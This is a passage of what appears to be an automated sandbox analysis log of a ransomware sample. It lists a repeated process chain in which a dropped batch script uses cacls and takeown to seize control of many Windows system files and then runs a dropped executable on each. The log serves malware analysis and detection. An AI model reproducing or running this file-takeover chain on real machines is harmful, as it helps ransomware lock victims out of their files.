    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:5248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "store.db" -nobanner
    3⤵
    PID:4324
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:8184
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.e3c80986-e39a-4d18-8bf8-215374e9ddda.2.etl""
  2⤵
  PID:7692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.e3c80986-e39a-4d18-8bf8-215374e9ddda.2.etl" /E /G Admin:F /C
    3⤵
    PID:5732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.e3c80986-e39a-4d18-8bf8-215374e9ddda.2.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MoUsoCoreWorker.e3c80986-e39a-4d18-8bf8-215374e9ddda.2.etl" -nobanner
    3⤵
    PID:6556
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MoUsoCoreWorker.e3c80986-e39a-4d18-8bf8-215374e9ddda.2.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:8172
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:5632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:7644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:824
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3868
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:7672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:7524
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5720
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""
  2⤵
  PID:8724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:7744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
    3⤵
    PID:7784
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:7776
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""
  2⤵
  PID:8116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
    3⤵
    PID:7000
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:4340
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""
  2⤵
  PID:6364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
    3⤵
    PID:7280
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:7532
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl""
  2⤵
  PID:7260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl" /E /G Admin:F /C
    3⤵
    PID:6740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl" -nobanner
    3⤵
    PID:7016
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "UpdateSessionOrchestration.6e6b6958-93c7-4e70-af16-4d8788c3250d.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:7968
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "background.png" -nobanner
    3⤵
    PID:7112
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "background.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:7020
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:7008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:7044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2480
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:4396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:7128
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""
  2⤵
  PID:7884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"
    3⤵
    PID:7820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
    3⤵
    PID:5136
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:6168
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:5864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:5476
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "behavior.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:6456
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:9104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:9132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    PID:6968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6684
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:8852
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:9192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:8836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    PID:8792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2804
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:8900
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
    3⤵
    PID:7824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
    3⤵
    PID:5656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    3⤵
    PID:6616
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftNotepad.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5920
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  2⤵
  PID:7380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:5744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    3⤵
    PID:448
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:4356
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  2⤵
  PID:6280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
    3⤵
    PID:5960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
    3⤵
    PID:6924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "NetworkPrinters.xml" -nobanner
    3⤵
    PID:5776
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "NetworkPrinters.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:7856
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl""
  2⤵
  PID:6564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl" /E /G Admin:F /C
    3⤵
    PID:308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl"
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl" -nobanner
    3⤵
    PID:6780
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "UpdateSessionOrchestration.e99e3edb-8b46-4645-82b0-d973a865cb19.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:5312
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""
  2⤵
  PID:6504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"
    3⤵
    PID:8440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
    3⤵
    PID:8432
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""
  2⤵
  PID:8052
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C
    3⤵
    PID:8420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"
    3⤵
    - Modifies file permissions
    PID:6232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftWordpad.xml" -nobanner
    3⤵
    PID:2120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftWordpad.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3092
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c2bca21e-6c7f-4082-a863-47556552ec85.1.etl""
  2⤵
  PID:8516
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c2bca21e-6c7f-4082-a863-47556552ec85.1.etl" /E /G Admin:F /C
    3⤵
    PID:9064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c2bca21e-6c7f-4082-a863-47556552ec85.1.etl"
    3⤵
    PID:8464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "UpdateSessionOrchestration.c2bca21e-6c7f-4082-a863-47556552ec85.1.etl" -nobanner
    3⤵
    PID:8404
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "UpdateSessionOrchestration.c2bca21e-6c7f-4082-a863-47556552ec85.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:8336
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""
  2⤵
  PID:8572
- - C:\Windows\SysWOW64\cacls.exe
